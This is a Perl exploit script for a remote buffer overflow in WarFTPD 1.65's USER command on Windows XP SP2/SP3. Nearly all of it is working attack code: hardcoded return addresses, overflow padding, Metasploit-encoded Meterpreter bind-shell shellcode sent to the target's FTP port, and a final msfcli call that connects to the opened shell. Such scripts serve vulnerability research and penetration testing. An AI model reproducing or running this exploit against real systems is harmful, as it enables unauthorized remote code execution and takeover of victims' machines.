# Exploit Title: Remote Buffer Overflow Exploit WarFTPD 1.65 (USER) - Windows XP Pro SP2 / SP3 [English] # Date: 26/6/2010 # Author: mr.pr0n # Software Link: # Version: WarFTPD 1.65 # Tested on: Windows XP Pro SP2 / SP3 [English] # CVE : # Code : #!/usr/bin/perl
use IO::Socket;
print "\n#----[ mr.pr0n ]--------------------------------------------------------#\n"; print "# Target App: WarFTPD 1.65 (USER). #\n"; print "# Attack : Remote Buffer Overflow Exploit. #\n"; print "# Target OS : Windows XP Pro [Service Pack 2 / Service Pack 3]. #\n"; print "#----------------------------------------[http://www.p0wnbox.com]-------#\n"; print "\nEnter your target's IP (e.g.: 192.168.0.123)\n"; print "> "; $target=<STDIN>; chomp($target); print "Enter your target's version of Windows XP Service Pack [2/3] (e.g.: 2)\n"; print "> "; $sp=<STDIN>; chomp($sp);
if ($sp == 2) { # Lets define the RET, if our target is Windows SP2. $RET= "\x72\x93\xab\x71"; # ws2_32.dll push ESP - ret } elsif ($sp == 3) { # Lets define the RET, if our target is Windows SP3. $RET= "\x53\x2b\xab\x71"; # ws2_32.dll push ESP - ret } else { print "[-] Wrong version of Windows XP Service Pack!\n"; exit(1); }
# We need 485 bytes to override the EIP. $junkBytes = "\x41" x 485; # Send 485 "A".
# We need 569 bytes to override the Seh Handler. $junkBytes_2 = "\x41" x 84; # Send(485 + 84 =)569 "A".
#-----------------------------------------------------------------------------------------------------------------------# #[pr0n@megatron ~]$ msfpayload windows/meterpreter/bind_tcp LPORT=4444 R | msfencode -b '\x00\x0a\x0d\x40' -t c # #[*] x86/shikata_ga_nai succeeded with size 326 (iteration=1) # #-----------------------------------------------------------------------------------------------------------------------#
#-----------------------------------------------# # windows/meterpreter/bind_tcp - 326 bytes # # http://www.metasploit.com # # Encoder: x86/shikata_ga_nai # # Bad Characters: \x00, \x0a, \x0d, \x40 # # LPORT=4444 # #-----------------------------------------------#
$shellcode = "\xdb\xd3\x33\xc9\xd9\x74\x24\xf4\xb1\x4b\xba\xab\x11\xad\x09". "\x5b\x83\xeb\xfc\x31\x53\x16\x03\x53\x16\xe2\x5e\xed\x45\x80". "\xa0\x0e\x96\xf3\x29\xeb\xa7\x21\x4d\x7f\x95\xf5\x06\x2d\x16". "\x7d\x4a\xc6\xad\xf3\x42\xe9\x06\xb9\xb4\xc4\x97\x0f\x78\x8a". "\x54\x11\x04\xd1\x88\xf1\x35\x1a\xdd\xf0\x72\x47\x2e\xa0\x2b". "\x03\x9d\x55\x58\x51\x1e\x57\x8e\xdd\x1e\x2f\xab\x22\xea\x85". "\xb2\x72\x43\x91\xfc\x6a\xef\xfd\xdc\x8b\x3c\x1e\x20\xc5\x49". "\xd5\xd3\xd4\x9b\x27\x1c\xe7\xe3\xe4\x23\xc7\xe9\xf5\x64\xe0". "\x11\x80\x9e\x12\xaf\x93\x65\x68\x6b\x11\x7b\xca\xf8\x81\x5f". "\xea\x2d\x57\x14\xe0\x9a\x13\x72\xe5\x1d\xf7\x09\x11\x95\xf6". "\xdd\x93\xed\xdc\xf9\xf8\xb6\x7d\x58\xa5\x19\x81\xba\x01\xc5". "\x27\xb1\xa0\x12\x51\x98\xac\xd7\x6c\x22\x2d\x70\xe6\x51\x1f". "\xdf\x5c\xfd\x13\xa8\x7a\xfa\x54\x83\x3b\x94\xaa\x2c\x3c\xbd". "\x68\x78\x6c\xd5\x59\x01\xe7\x25\x65\xd4\xa8\x75\xc9\x87\x08". "\x25\xa9\x77\xe1\x2f\x26\xa7\x11\x50\xec\xc0\xe3\x75\x5c\x87". "\x01\x89\x72\x0b\x8f\x6f\x1e\xa3\xd9\x38\xb7\x01\x3e\xf1\x20". "\x79\x14\xae\xf9\xed\x20\xb9\x3e\x11\xb1\xec\x6c\xbe\x19\x66". "\xe7\xac\x9d\x97\xf8\xf8\xb5\xc0\x6f\x76\x54\xa3\x0e\x87\x7d". "\x51\xd1\x1d\x7a\xf3\x86\x89\x80\x22\xe0\x15\x7a\x01\x7a\x9f". "\xee\xe9\x15\xe0\xfe\xe9\xe5\xb6\x94\xe9\x8d\x6e\xcd\xba\xa8". "\x70\xd8\xaf\x60\xe5\xe3\x99\xd5\xae\x8b\x27\x03\x98\x13\xd8". "\x66\x18\x6f\x0f\x4f\x9e\x99\x3a\xa3\x62\x6f";
if ($socket = IO::Socket::INET->new (PeerAddr => $target, # Default FTP Port! PeerPort => "21", Proto => "TCP")) { print "\n[*] Sending Buffer at: $target ...\n"; # This is our Buffer, we are sending a long username with the USER ftp command. $exploit = "USER ".$junkBytes.$RET.$junkBytes_2.$shellcode; print $socket $exploit."\r\n"; # Hey, wait only for a sec! sleep(1); close($socket); print "[*] Exploitation Done!\n";
# Connect to the victim with metasploit. $command = "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=$target LPORT=4444 E\n"; system ($command); }
else { print "[-] Connection to $target failed!\n"; }
|